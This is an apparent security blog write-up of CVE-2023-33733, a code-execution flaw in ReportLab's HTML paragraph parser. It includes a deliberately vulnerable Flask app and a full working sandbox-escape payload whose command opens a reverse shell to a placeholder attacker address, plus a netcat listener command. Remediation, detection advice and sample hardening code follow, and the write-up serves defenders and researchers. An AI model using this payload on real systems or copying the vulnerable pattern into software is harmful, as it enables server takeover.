CVE-2023-33733: RCE in Reportlab's HTML Parser

2024-05-02

James McGill

Introduction

CVE-2023-33733 is a remote code execution (RCE) vulnerability in ReportLab, a popular Python library for generating PDF documents. The flaw is reachable through the library's HTML-like paragraph markup parser, so an attacker who controls markup passed to a vulnerable ReportLab version can execute arbitrary code on the system running it.

Technical Breakdown

ReportLab's paragraph parser accepts an HTML-like markup with tags such as <para> and <font>. Some attribute values, notably the color attribute of <font>, are not always treated as plain strings: a value that is not recognized as a color name or literal can be evaluated as a Python expression inside a restricted sandbox called rl_safe_eval. The sandbox is meant to block access to dangerous built-ins and double-underscore attributes, but its checks can be bypassed, so an attacker who controls the attribute value can run arbitrary Python code.

Here's a breakdown of the exploitation process:

Malicious HTML Construction: The attacker constructs an HTML snippet whose color attribute contains a Python expression instead of a color.
Triggering ReportLab Parsing: The attacker delivers the crafted HTML to an application that uses ReportLab for PDF generation. This can be achieved through various methods, depending on the application's functionality.
Sandbox Bypass: When ReportLab evaluates the attribute value, the expression escapes the restrictions of rl_safe_eval and reaches the os module, which lets it run operating system commands.

Impact

A successful exploit of CVE-2023-33733 grants the attacker the ability to execute arbitrary code on the vulnerable system. This can lead to a complete compromise of the system, allowing attackers to install malware, steal data, or pivot to other systems within the network.

Proof of Concept

To build a proof-of-concept lab for this attack, we will host a Flask app that parses any uploaded file using ReportLab 3.6.12, which is vulnerable to CVE-2023-33733. We will use the following Flask app in this PoC:

from flask import Flask, render_template, request, send_file
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.styles import getSampleStyleSheet
from io import BytesIO

app = Flask(__name__)
stream_file = BytesIO()
content = []

def add_paragraph(text, content):
    """ Add paragraph to document content"""
    content.append(Paragraph(text))

def get_document_template(stream_file: BytesIO):
    """ Get SimpleDocTemplate """
    return SimpleDocTemplate(stream_file)

def build_document(document, content, **props):
    """ Build pdf document based on elements added in `content`"""
    document.build(content, **props)

@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template('index.html')

@app.route('/convert', methods=['POST'])
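def convert():
    # The route only accepts POST, so no explicit method check is needed.
    html_file = request.files['file']
    html_content = html_file.read().decode("utf-8")
    # Use a fresh buffer and content list per request so uploads do not accumulate.
    buffer = BytesIO()
    story = []
    # Deliberately vulnerable: untrusted markup goes straight into Paragraph.
    add_paragraph(html_content, story)
    build_document(get_document_template(buffer), story)
    # Return the generated PDF as an attachment (download_name needs Flask 2.0+).
    buffer.seek(0)
    return send_file(buffer, mimetype='application/pdf',
                     as_attachment=True, download_name='output.pdf')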

if __name__ == '__main__':
    app.run(debug=True)

We can use the following command to start our server hosting the above app:

python3 app.py

We can visit localhost:5000 to verify that the app is up and running.

Now we need to craft a malicious HTML file that we can upload to this server to exploit CVE-2023-33733. We will use the following HTML:

<para>
    <font color="[ [ getattr(pow,Attacker('__globals__'))['os'].system('TF=$(mktemp -u);mkfifo $TF && telnet <ATTACKER_IP> <NETCAT_LISTENER_PORT> 0<$TF | bash 1>$TF') for Attacker in [orgTypeFun('Attacker', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">
    exploit
    </font>
</para>

The Flask app above is vulnerable to this HTML file because it passes the uploaded content straight to ReportLab's Paragraph, which evaluates the color attribute of the <font> tag as a Python expression.

Let's break down the payload and how it leverages CVE-2023-33733:

Nested list comprehensions: The sandbox evaluates a single expression, so the payload uses nested list comprehensions to bind the names orgTypeFun and Attacker without assignment statements. The trailing and 'red' makes the whole expression evaluate to a valid color name.
Recovering the real type: type(type(1)) returns Python's built-in type class rather than the sandbox's restricted replacement. The payload calls it with three arguments to create Attacker, a str subclass whose startswith, __eq__, and __hash__ methods are overridden to defeat the sandbox's attribute-name checks.
Exploiting getattr: getattr(pow, Attacker('__globals__')) gets past the sandbox's guarded getattr and returns the global namespace of the module that defines the sandbox's pow function, which includes the os module.
os.system for Code Execution: With the os module in hand, the payload calls os.system to execute a system command. This is the core of the exploit and is what turns the sandbox escape into remote code execution (RCE).
Command for Reverse Shell: The command creates a named pipe and uses telnet and bash to open a reverse shell to the attacker's IP address and port. If executed, this gives us remote access to the server.

How CVE-2023-33733 plays a role:

The success of this exploit relies on the flaw in ReportLab's rl_safe_eval sandbox. rl_safe_eval is supposed to reject any attribute name that starts with a double underscore or appears on its list of unsafe names. Because Attacker is a str subclass that overrides startswith, __eq__, and __hash__, an instance holding '__globals__' passes those checks, yet Python's real getattr still treats it as the name __globals__. From there the expression reaches os.system, and the operating system command runs with the privileges of the application.
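The weakness of a name check that trusts methods on its input can be shown without ReportLab. The following is a toy sketch, not ReportLab's actual code: naive_is_allowed, strict_is_allowed, and LyingStr are hypothetical names chosen for illustration, and the hardened variant is only one possible mitigation, not necessarily the one used in the patched release.

```python
def naive_is_allowed(name):
    """Toy guard: reject names that look like double-underscore attributes."""
    # Calls a method on the input, so a subclass can override the answer.
    return not name.startswith('__')


def strict_is_allowed(name):
    """Hardened toy guard: accept only exact str instances before checking."""
    if type(name) is not str:
        return False
    return not name.startswith('__')


class LyingStr(str):
    """A str subclass that misreports startswith(), similar in spirit to the payload's class."""

    def startswith(self, prefix, *args):
        return False


probe = LyingStr('__globals__')
naive_result = naive_is_allowed(probe)    # the naive guard is fooled
strict_result = strict_is_allowed(probe)  # the strict guard rejects the subclass
```

The design point is that a security check should not call overridable methods on attacker-supplied objects; checking the exact type first (or converting the value with the built-in str class) removes that avenue in this toy setting.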

Now, we can move ahead with our PoC attack. Before we upload this malicious HTML file, we have to initiate a netcat listener on our attacking machine to capture the reverse shell in case the attack succeeds.

nc -lvnp 4444

With the listener ready, let's upload the HTML file to the server.

We successfully receive the reverse shell and can now execute any command on the system.

Remediation

Upgrading ReportLab to a version that addresses CVE-2023-33733 is crucial. At the time of this writing, ReportLab versions 3.6.13 and above are reported to be patched. Additionally, applications using ReportLab should be thoroughly reviewed to ensure that user-provided HTML input is validated and sanitized before it is processed with ReportLab.
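Both remediation steps can be sketched in a few lines of Python. This is a minimal sketch under stated assumptions: the helper names (parse_version, is_patched, installed_reportlab_is_patched, escape_untrusted_text) are hypothetical, the version parser is deliberately simplified, and the 3.6.13 threshold comes from the statement above rather than from an independent check. Escaping is only appropriate when users are expected to supply plain text rather than markup.

```python
import re
from importlib import metadata
from xml.sax.saxutils import escape

# First release reported as patched for CVE-2023-33733 (taken from the text above).
PATCHED_VERSION = (3, 6, 13)


def parse_version(version):
    """Turn a string such as '3.6.12' into a 3-tuple of ints (simplified parser)."""
    parts = []
    for piece in version.split('.')[:3]:
        match = re.match(r'\d+', piece)
        parts.append(int(match.group()) if match else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_patched(version):
    """Return True if the given version string is at or above the patched release."""
    return parse_version(version) >= PATCHED_VERSION


def installed_reportlab_is_patched():
    """Return True/False for the installed ReportLab, or None if it is not installed."""
    try:
        return is_patched(metadata.version('reportlab'))
    except metadata.PackageNotFoundError:
        return None


def escape_untrusted_text(text):
    """Escape &, < and > so user text is rendered literally instead of parsed as markup."""
    return escape(text)
```

An application could refuse to start when installed_reportlab_is_patched() returns False, and wrap user input as Paragraph(escape_untrusted_text(user_text)) so that tags such as <font> never reach the markup parser.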

Detection

Since the payload is evaluated inside the application process during the HTML parsing stage, traditional signature-based detection methods might not be sufficient. Behavioral monitoring can help identify anomalies in the application's behavior, such as the PDF-generating process spawning a shell or opening unexpected outbound connections. Additionally, application-level controls that prevent untrusted HTML data from being processed can significantly mitigate the risk of exploitation.
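As one possible application-level control, uploaded markup can be screened for attribute values that look like Python code before it is handed to ReportLab. The sketch below is a heuristic only: the function name suspicious_attributes and the token list are assumptions made for illustration, a determined attacker may evade such a filter, and it does not replace upgrading.

```python
import re

# Matches name="value" or name='value' attribute pairs inside markup.
ATTR_RE = re.compile(r"""([A-Za-z_:][\w:.-]*)\s*=\s*(?:"([^"]*)"|'([^']*)')""")

# Tokens that rarely appear in a legitimate color or style attribute.
# This list is an assumption and should be tuned per application.
SUSPICIOUS_TOKENS = ('__', 'getattr', 'lambda', 'type(', 'os.', 'system(', ' for ')


def suspicious_attributes(markup):
    """Return (attribute name, matched tokens) pairs for values that look like code."""
    findings = []
    for match in ATTR_RE.finditer(markup):
        name = match.group(1)
        # Exactly one of the two value groups is set, depending on the quote style.
        value = match.group(2) if match.group(2) is not None else match.group(3)
        hits = [token for token in SUSPICIOUS_TOKENS if token in value]
        if hits:
            findings.append((name, hits))
    return findings
```

A caller could reject or log any upload for which suspicious_attributes(html_content) returns a non-empty list, while letting ordinary values such as color="red" through.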

Conclusion

CVE-2023-33733 highlights the importance of maintaining software libraries and ensuring proper input validation within applications. By keeping Reportlab updated and implementing robust input sanitization practices, security researchers and developers can significantly reduce the risk of exploitation.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-33733 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.